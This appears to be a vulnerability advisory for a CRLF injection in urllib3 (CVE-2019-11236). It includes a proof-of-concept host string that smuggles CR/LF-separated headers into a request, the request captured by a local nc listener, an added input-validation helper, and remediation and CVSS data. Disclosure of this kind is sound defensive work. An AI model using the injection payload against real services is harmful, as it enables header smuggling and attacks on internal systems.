CRLF injection

Affecting urllib3 package, versions [,1.24.3)

Overview

urllib3 is an HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to CRLF injection. An attacker who controls the request address (host) parameter can inject CR/LF sequences that terminate the request line, add arbitrary HTTP headers to the outgoing request, and thereby attack an internal service.

PoC

by ragdoll and Alvin Chang

import urllib3

pool_manager = urllib3.PoolManager()

# Attacker-controlled "host" value: the embedded CR/LF sequences terminate the
# request line and append extra header lines to the outgoing request.
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a"

try:
    info = pool_manager.request('GET', url).info()
    print(info)
except Exception:
    pass

Request as received by a listener started with: nc -l localhost 7777

GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123:8080/test/?test=a HTTP/1.1
Host: localhost:7777
Accept-Encoding: identity

The nc listener displays the HTTP request with the injected header line "X-injected: header", confirming that the attacker-controlled host value was written into the request as a header.
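An application-side mitigation, added here as an example and not part of the advisory or of urllib3: validate an untrusted host[:port] value before it is concatenated into a URL, rejecting control characters on the raw string (the PoC payload above is refused). The names validate_authority, build_url and is_rejected are hypothetical.

```python
import re
from urllib.parse import urlsplit

# Constructed helper, not urllib3 code: only a bare hostname with an optional
# numeric port is accepted as an "authority" string.
_AUTHORITY_RE = re.compile(
    r"^(?P<host>[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?)"
    r"(?::(?P<port>[0-9]{1,5}))?$"
)


def validate_authority(value, allowed_hosts=frozenset()):
    """Return value unchanged if it is a plain host[:port], else raise ValueError.

    The control-character check runs on the raw string first: the PoC relies
    on CR/LF, and urllib.parse.urlsplit silently drops \\r, \\n and \\t on
    recent Python releases, so a check on parsed components would miss them.
    """
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F or ch.isspace() for ch in value):
        raise ValueError("control or whitespace character in host")
    match = _AUTHORITY_RE.match(value)
    if match is None:
        raise ValueError("host is not a bare hostname[:port]")
    port = match.group("port")
    if port is not None and not 1 <= int(port) <= 65535:
        raise ValueError("port out of range")
    if allowed_hosts and match.group("host").lower() not in allowed_hosts:
        raise ValueError("host not in allowlist")
    return value


def build_url(untrusted_host, path="/test/", query="test=a", allowed_hosts=frozenset()):
    """Build the same shape of URL as the PoC, but only from a validated host."""
    authority = validate_authority(untrusted_host, allowed_hosts)
    url = "http://" + authority + path
    return url + "?" + query if query else url


def is_rejected(untrusted_host, **kwargs):
    """True if the host would be refused; useful in tests and input audits."""
    try:
        build_url(untrusted_host, **kwargs)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Payload from the advisory's PoC: refused before urllib3 ever sees it.
    poc_host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
    print(is_rejected(poc_host))                   # True
    print(build_url("localhost:7777"))             # http://localhost:7777/test/?test=a
    # The stdlib parser reports a plausible hostname for the same payload,
    # which is why the check must look at the raw string.
    print(urlsplit("http://" + poc_host + ":8080/test/?test=a").hostname)
```

The validated string returned by build_url is what you would hand to pool_manager.request; the check is a defence in depth and does not replace upgrading urllib3.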

Remediation

Upgrade urllib3 to version 1.24.3 or higher.

CVSS Score

7.3
high severity

Exploit: Mature
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    Low
  • Integrity
    Low
  • Availability
    Low
  • Exploit maturity
    High
  • Remediation Level
    Official
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:H/RL:O/RC:C
Credit: ragdoll
CVE: CVE-2019-11236
CWE: CWE-93
Snyk ID: SNYK-PYTHON-URLLIB3-174323
Disclosed: 15 Apr, 2019
Published: 18 Apr, 2019